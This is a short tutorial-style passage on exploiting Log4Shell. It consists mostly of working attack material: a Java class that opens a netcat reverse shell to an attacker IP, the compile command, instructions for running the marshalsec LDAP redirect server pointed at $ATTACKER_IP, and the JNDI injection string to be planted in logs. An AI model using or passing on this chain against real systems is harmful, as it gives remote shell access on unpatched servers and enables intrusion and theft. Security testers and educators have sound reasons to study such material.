Reverse shell

A simple Java exploit that pops a reverse shell (at least on Linux systems with a version of netcat that supports the -e switch) is:

public class Exploit {
	static {
		try {
			java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 1.2.3.4 9999");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

Where 1.2.3.4 is the IP you’re catching the reverse shell at and 9999 is the port of the listener. This can be compiled with:

javac Exploit.java -source 8 -target 8

Note that the -source and -target flags may need to be modified depending on which version of Java the target is running. As with all things Java, the file name and file class name need to match.

Delivery with Log4Shell

Delivery through a vulnerable version of Log4j is done through a four step process: Malicious string → LDAP lookup → load Java code over HTTP → reverse shell.

A simple Java LDAP server that will handle redirects is available at https://github.com/mbechler/marshalsec. It can be built with Apache Maven using the version of OpenJDK supplied with Kali Linux:

mvn clean package -DskipTests

Then run with:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar \
         marshalsec.jndi.LDAPRefServer \
         "http://$ATTACKER_IP:$ATTACKER_PORT/#Exploit"

Where $ATTACKER_IP and $ATTACKER_PORT are the IP address and port of an HTTP server that will be used to actually serve up the exploit.

Once that’s done you’ll just need to fire up a quick web server to serve appropriate exploit code (like the example reverse shell above) and a netcat listener, and then find a way to deliver the malicious string (${jndi:ldap://1.2.3.4:1389/Exploit}, where 1.2.3.4 is the $ATTACKER_IP above) somewhere it will be logged.

Note that a number of other protocols are supported besides LDAP (the marchalsec server supports a few).